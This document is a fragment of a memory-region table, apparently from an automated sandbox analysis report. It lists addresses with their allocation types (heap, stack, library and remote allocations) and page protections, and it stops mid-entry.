2A7CE240000
|
heap
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
2405A770000
|
trusted library allocation
|
page read and write
|
||
1C9E3EA1000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBC0000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1CA582D0000
|
remote allocation
|
page read and write
|
||
1C9E3DD9000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
1D38E07C000
|
trusted library allocation
|
page read and write
|
||
1D38DD50000
|
heap
|
page execute and read and write
|
||
1B3B49C0000
|
remote allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6B50000
|
trusted library allocation
|
page read and write
|
||
1CA57AC9000
|
heap
|
page read and write
|
||
7FFEBCBF0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2ED70C6F000
|
heap
|
page read and write
|
||
332E000
|
stack
|
page read and write
|
||
F5A97F7000
|
stack
|
page read and write
|
||
170BFFA0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7A3000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAE0000
|
trusted library allocation
|
page read and write
|
||
A1A86FB000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2E9D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEBCB50000
|
trusted library allocation
|
page read and write
|
||
1C9E3F2F000
|
heap
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
24666F83000
|
heap
|
page read and write
|
||
F5A98FF000
|
stack
|
page read and write
|
||
F73E4F7000
|
stack
|
page read and write
|
||
1D38C465000
|
heap
|
page read and write
|
||
2465EDD6000
|
trusted library allocation
|
page read and write
|
||
7DF41D6B0000
|
trusted library allocation
|
page execute and read and write
|
||
1B3CD1D2000
|
heap
|
page read and write
|
||
1C9E1FA2000
|
heap
|
page read and write
|
||
20531C3B000
|
direct allocation
|
page read and write
|
||
2464D170000
|
heap
|
page read and write
|
||
1D99E924000
|
heap
|
page read and write
|
||
1CA57AE3000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
2ED70C8D000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC90000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
170BF6A0000
|
heap
|
page read and write
|
||
1C9E203D000
|
heap
|
page read and write
|
||
2ED70C7A000
|
heap
|
page read and write
|
||
68E187E000
|
stack
|
page read and write
|
||
5F60000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA17000
|
trusted library allocation
|
page read and write
|
||
55B0000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1C9E2140000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1CA57A3C000
|
heap
|
page read and write
|
||
1C9E2130000
|
remote allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC70000
|
trusted library allocation
|
page read and write
|
||
1D3A6717000
|
trusted library allocation
|
page read and write
|
||
1600000
|
trusted library allocation
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
1D9A1590000
|
direct allocation
|
page read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA6000
|
heap
|
page read and write
|
||
1D3A6719000
|
trusted library allocation
|
page read and write
|
||
1D99E7B1000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D9A1450000
|
direct allocation
|
page read and write
|
||
2938AA53000
|
heap
|
page read and write
|
||
5A90000
|
remote allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1CA585D4000
|
heap
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAD0000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
16F31BE000
|
stack
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
1412000
|
heap
|
page read and write
|
||
1D9A146B000
|
direct allocation
|
page read and write
|
||
1D3A6716000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAC0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC30000
|
trusted library allocation
|
page read and write
|
||
17F30310000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
20531CB0000
|
direct allocation
|
page read and write
|
||
1C9E3EB5000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9D0000
|
trusted library allocation
|
page read and write
|
||
17F303DF000
|
heap
|
page read and write
|
||
16F2CFE000
|
stack
|
page read and write
|
||
2B019E7C000
|
heap
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC876000
|
trusted library allocation
|
page execute and read and write
|
||
24667800000
|
trusted library allocation
|
page read and write
|
||
1B3B2BD0000
|
heap
|
page read and write
|
||
2464CF60000
|
remote allocation
|
page read and write
|
||
1D99E7A5000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D38C2E0000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2052EF37000
|
heap
|
page read and write
|
||
7FFEBCA80000
|
trusted library allocation
|
page read and write
|
||
1C9E1FB9000
|
heap
|
page read and write
|
||
1B3B4A10000
|
trusted library allocation
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1B3CD21D000
|
heap
|
page read and write
|
||
A8C317C000
|
stack
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1CA57AEF000
|
heap
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
2ED70C27000
|
heap
|
page read and write
|
||
24667810000
|
trusted library allocation
|
page read and write
|
||
1C9E2057000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC960000
|
trusted library allocation
|
page execute and read and write
|
||
B98DC7C000
|
stack
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
24667476000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB6A000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
2052EF20000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC7B0000
|
trusted library allocation
|
page read and write
|
||
1D3A67F0000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2464D103000
|
heap
|
page read and write
|
||
5610000
|
heap
|
page execute and read and write
|
||
7FFEBC9C0000
|
trusted library allocation
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
324E000
|
stack
|
page read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
2464F530000
|
trusted library allocation
|
page read and write
|
||
18AE000
|
stack
|
page read and write
|
||
16DF000
|
stack
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
1B3B2E85000
|
heap
|
page read and write
|
||
5F40000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
25219F80000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
1D9A1360000
|
direct allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
2052EF49000
|
heap
|
page read and write
|
||
1D99E7A9000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1B3B54C0000
|
trusted library allocation
|
page read and write
|
||
1D3A67A0000
|
trusted library allocation
|
page read and write
|
||
6130000
|
trusted library allocation
|
page read and write
|
||
2052EF90000
|
heap
|
page read and write
|
||
2ED70C29000
|
heap
|
page read and write
|
||
2F70000
|
trusted library allocation
|
page read and write
|
||
1B3B4C52000
|
trusted library allocation
|
page read and write
|
||
1B3B4860000
|
heap
|
page read and write
|
||
A8C35BE000
|
stack
|
page read and write
|
||
20531D10000
|
direct allocation
|
page read and write
|
||
1D3A6731000
|
trusted library allocation
|
page read and write
|
||
1B3B2ECB000
|
heap
|
page read and write
|
||
2464EA00000
|
trusted library allocation
|
page read and write
|
||
156E000
|
stack
|
page read and write
|
||
68E19FA000
|
stack
|
page read and write
|
||
2052EF89000
|
heap
|
page read and write
|
||
4357000
|
trusted library allocation
|
page read and write
|
||
2938AB13000
|
heap
|
page read and write
|
||
1C9E3FEE000
|
heap
|
page read and write
|
||
1CA5858B000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
246674A2000
|
trusted library allocation
|
page read and write
|
||
17F303E6000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
7FFEBC932000
|
trusted library allocation
|
page read and write
|
||
24667520000
|
trusted library allocation
|
page read and write
|
||
1D3A6790000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB4A000
|
trusted library allocation
|
page read and write
|
||
2938AA51000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1C9E3E07000
|
heap
|
page read and write
|
||
1D9A14C0000
|
direct allocation
|
page read and write
|
||
7FFEBCA50000
|
trusted library allocation
|
page read and write
|
||
1D38DD57000
|
heap
|
page execute and read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A67E0000
|
trusted library allocation
|
page read and write
|
||
1D99E7BE000
|
heap
|
page read and write
|
||
2052EF26000
|
heap
|
page read and write
|
||
1B3B5B92000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC790000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB71000
|
trusted library allocation
|
page read and write
|
||
2B01A802000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB84000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAF2000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
16F2DFE000
|
stack
|
page read and write
|
||
1B3B5C2B000
|
trusted library allocation
|
page read and write
|
||
33DB000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAB0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
121AB3A9000
|
heap
|
page read and write
|
||
2938AA86000
|
heap
|
page read and write
|
||
7FFEBCC00000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA70000
|
trusted library allocation
|
page read and write
|
||
1D99E815000
|
heap
|
page read and write
|
||
1B3CD213000
|
heap
|
page read and write
|
||
16E7000
|
heap
|
page read and write
|
||
1C9E205B000
|
heap
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
FBC000
|
stack
|
page read and write
|
||
7FFEBC9C5000
|
trusted library allocation
|
page read and write
|
||
1B3CCF6B000
|
heap
|
page read and write
|
||
16F3CCD000
|
stack
|
page read and write
|
||
1B3B4850000
|
trusted library allocation
|
page read and write
|
||
1D3A67D0000
|
trusted library allocation
|
page read and write
|
||
587B000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
2464FDC4000
|
trusted library allocation
|
page read and write
|
||
2B019E4D000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
5620000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6B8C000
|
trusted library allocation
|
page read and write
|
||
2ED70D02000
|
heap
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674D0000
|
trusted library allocation
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
2B019F13000
|
heap
|
page read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D38C33D000
|
heap
|
page read and write
|
||
1D9A1380000
|
direct allocation
|
page read and write
|
||
1D99E818000
|
heap
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
1D99E801000
|
heap
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
32C0000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
2521A113000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9F0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA30000
|
trusted library allocation
|
page read and write
|
||
1D3A6752000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB81000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
2938AA00000
|
heap
|
page read and write
|
||
1C9E3E06000
|
heap
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
1D3A67A0000
|
trusted library allocation
|
page read and write
|
||
5F50000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAE0000
|
trusted library allocation
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2B019E2C000
|
heap
|
page read and write
|
||
1CA58597000
|
heap
|
page read and write
|
||
24667510000
|
trusted library allocation
|
page read and write
|
||
2466705C000
|
heap
|
page read and write
|
||
170BF857000
|
heap
|
page read and write
|
||
246674DE000
|
trusted library allocation
|
page read and write
|
||
1B3B49F0000
|
trusted library allocation
|
page read and write
|
||
55D0000
|
trusted library allocation
|
page read and write
|
||
1B3B5B9A000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1B3CD1B0000
|
heap
|
page read and write
|
||
2405A7D0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA20000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2052EF37000
|
heap
|
page read and write
|
||
5E28000
|
trusted library allocation
|
page read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
1B3CCF34000
|
heap
|
page read and write
|
||
1CA57B13000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
1D9A14A0000
|
direct allocation
|
page read and write
|
||
C4262FD000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
17F303B2000
|
heap
|
page read and write
|
||
1CA585A6000
|
heap
|
page read and write
|
||
7FFEBCAF0000
|
trusted library allocation
|
page read and write
|
||
3098000
|
trusted library allocation
|
page read and write
|
||
2052EF68000
|
heap
|
page read and write
|
||
246674E0000
|
trusted library allocation
|
page read and write
|
||
1D99E7BB000
|
heap
|
page read and write
|
||
1B3CD3C0000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
A8C327E000
|
stack
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
20531DB0000
|
direct allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
E805FFE000
|
stack
|
page read and write
|
||
AB29B77000
|
stack
|
page read and write
|
||
1CA58513000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674F0000
|
trusted library allocation
|
page read and write
|
||
1B3B3080000
|
heap
|
page read and write
|
||
1CA57A80000
|
heap
|
page read and write
|
||
5E14000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2938AA70000
|
heap
|
page read and write
|
||
7FFEBCBB0000
|
trusted library allocation
|
page read and write
|
||
1B3B57FA000
|
trusted library allocation
|
page read and write
|
||
16F2AFF000
|
stack
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1C9E3FA1000
|
heap
|
page read and write
|
||
2A7CE2B0000
|
heap
|
page read and write
|
||
121AB328000
|
heap
|
page read and write
|
||
16F307E000
|
stack
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D99E818000
|
heap
|
page read and write
|
||
1D38E7E5000
|
trusted library allocation
|
page read and write
|
||
1CA58596000
|
heap
|
page read and write
|
||
1B3B5840000
|
trusted library allocation
|
page read and write
|
||
13E0000
|
heap
|
page read and write
|
||
1D9A1420000
|
direct allocation
|
page read and write
|
||
AB2967F000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBAF000
|
trusted library allocation
|
page read and write
|
||
2052EF7E000
|
heap
|
page read and write
|
||
EBC000
|
stack
|
page read and write
|
||
2EC0000
|
trusted library allocation
|
page read and write
|
||
46EBE79000
|
stack
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
68E197E000
|
stack
|
page read and write
|
||
1C9E2145000
|
heap
|
page read and write
|
||
C4264FF000
|
stack
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
A8C410E000
|
stack
|
page read and write
|
||
1D99E815000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
AB293FB000
|
stack
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1C9E2130000
|
remote allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D38C535000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1B3B5B78000
|
trusted library allocation
|
page read and write
|
||
1B3C4AA4000
|
trusted library allocation
|
page read and write
|
||
1D3A6934000
|
heap
|
page read and write
|
||
24667044000
|
heap
|
page read and write
|
||
20531C70000
|
direct allocation
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
1D99E82D000
|
heap
|
page read and write
|
||
7FFEBCBD0000
|
trusted library allocation
|
page read and write
|
||
2052EF4B000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D99E7C1000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
16AD000
|
stack
|
page read and write
|
||
1CA57AC2000
|
heap
|
page read and write
|
||
1D3A6790000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
16F3C4E000
|
stack
|
page read and write
|
||
17F303C4000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D99E81D000
|
heap
|
page read and write
|
||
2464FDA1000
|
trusted library allocation
|
page read and write
|
||
68E1B78000
|
stack
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6880000
|
trusted library allocation
|
page read and write
|
||
1C9E3EC4000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
24667476000
|
trusted library allocation
|
page read and write
|
||
2052EE40000
|
remote allocation
|
page read and write
|
||
E9ABF7000
|
stack
|
page read and write
|
||
3399000
|
trusted library allocation
|
page read and write
|
||
1C9E3F2C000
|
heap
|
page read and write
|
||
2405A6C1000
|
heap
|
page read and write
|
||
7FFEBCAA0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA50000
|
trusted library allocation
|
page read and write
|
||
24667500000
|
trusted library allocation
|
page read and write
|
||
2405A610000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB20000
|
trusted library allocation
|
page read and write
|
||
1CA57AB6000
|
heap
|
page read and write
|
||
2052EF08000
|
heap
|
page read and write
|
||
1D99E778000
|
heap
|
page read and write
|
||
1B3B49E2000
|
trusted library allocation
|
page read and write
|
||
F73E6FC000
|
stack
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
33B5000
|
trusted library allocation
|
page read and write
|
||
F73E3FB000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB10000
|
trusted library allocation
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
24667860000
|
trusted library allocation
|
page read and write
|
||
1570000
|
heap
|
page read and write
|
||
1D9A1460000
|
direct allocation
|
page read and write
|
||
1C9E1FDF000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
147C000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
170BF913000
|
heap
|
page read and write
|
||
2464D091000
|
heap
|
page read and write
|
||
516D000
|
stack
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
1B3CD1F6000
|
heap
|
page read and write
|
||
1B3B54B7000
|
trusted library allocation
|
page read and write
|
||
1C9E2071000
|
heap
|
page read and write
|
||
E9A6FF000
|
stack
|
page read and write
|
||
5E34000
|
trusted library allocation
|
page read and write
|
||
A8C2D4D000
|
stack
|
page read and write
|
||
170C0002000
|
trusted library allocation
|
page read and write
|
||
E9ACFE000
|
stack
|
page read and write
|
||
7FFEBC846000
|
trusted library allocation
|
page read and write
|
||
16D0000
|
heap
|
page read and write
|
||
1CA58597000
|
heap
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1B3B5B66000
|
trusted library allocation
|
page read and write
|
||
32ED000
|
stack
|
page read and write
|
||
1C9E1F98000
|
heap
|
page read and write
|
||
2EBA000
|
trusted library allocation
|
page execute and read and write
|
||
1C9E3EC4000
|
heap
|
page read and write
|
||
F5A90BC000
|
stack
|
page read and write
|
||
1620000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBA5000
|
trusted library allocation
|
page read and write
|
||
2466704A000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
2F60000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
246678E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
1D99E7AA000
|
heap
|
page read and write
|
||
24666F60000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
B98DF7B000
|
stack
|
page read and write
|
||
7FFEBCA90000
|
trusted library allocation
|
page read and write
|
||
1D38DD70000
|
heap
|
page execute and read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
F73E07B000
|
stack
|
page read and write
|
||
170BF87C000
|
heap
|
page read and write
|
||
2405B3C0000
|
trusted library allocation
|
page read and write
|
||
1CA58584000
|
heap
|
page read and write
|
||
16D6000
|
heap
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1C9E2063000
|
heap
|
page read and write
|
||
20531BD0000
|
direct allocation
|
page read and write
|
||
16F2F7E000
|
stack
|
page read and write
|
||
1B3B4A41000
|
trusted library allocation
|
page read and write
|
||
17F30330000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
1D3A6790000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
2464E950000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB5A000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
F5A96FE000
|
stack
|
page read and write
|
||
2464E9C0000
|
heap
|
page readonly
|
||
2405A590000
|
heap
|
page read and write
|
||
1D99E81C000
|
heap
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
2052EF9C000
|
heap
|
page read and write
|
||
2405A678000
|
heap
|
page read and write
|
||
1D9A1400000
|
direct allocation
|
page read and write
|
||
1D3A67B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
2464F566000
|
trusted library allocation
|
page read and write
|
||
24667520000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1414000
|
heap
|
page read and write
|
||
308F000
|
stack
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
18EE000
|
stack
|
page read and write
|
||
20531B70000
|
direct allocation
|
page read and write
|
||
E9AEFF000
|
stack
|
page read and write
|
||
7FFEBC990000
|
trusted library allocation
|
page read and write
|
||
2EB7000
|
trusted library allocation
|
page execute and read and write
|
||
1C9E3DA5000
|
heap
|
page read and write
|
||
68E1AF8000
|
stack
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
24667520000
|
trusted library allocation
|
page read and write
|
||
1B3B2E12000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
15F6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEBC79D000
|
trusted library allocation
|
page execute and read and write
|
||
24667510000
|
trusted library allocation
|
page read and write
|
||
1CA58564000
|
heap
|
page read and write
|
||
20531D60000
|
direct allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1D9A1500000
|
direct allocation
|
page read and write
|
||
14FD000
|
trusted library allocation
|
page execute and read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
1D3A67ED000
|
trusted library allocation
|
page read and write
|
||
20530870000
|
direct allocation
|
page read and write
|
||
1B3B2D30000
|
heap
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
1D99E80A000
|
heap
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D38C2E8000
|
heap
|
page read and write
|
||
2465EBE0000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2521A04F000
|
heap
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
1B3B5C23000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9F0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9C0000
|
trusted library allocation
|
page read and write
|
||
1C9E1E10000
|
heap
|
page read and write
|
||
1607000
|
trusted library allocation
|
page execute and read and write
|
||
176E000
|
unkown
|
page read and write
|
||
C4265FE000
|
stack
|
page read and write
|
||
7FFEBC980000
|
trusted library allocation
|
page execute and read and write
|
||
2521A890000
|
trusted library allocation
|
page read and write
|
||
2052EF00000
|
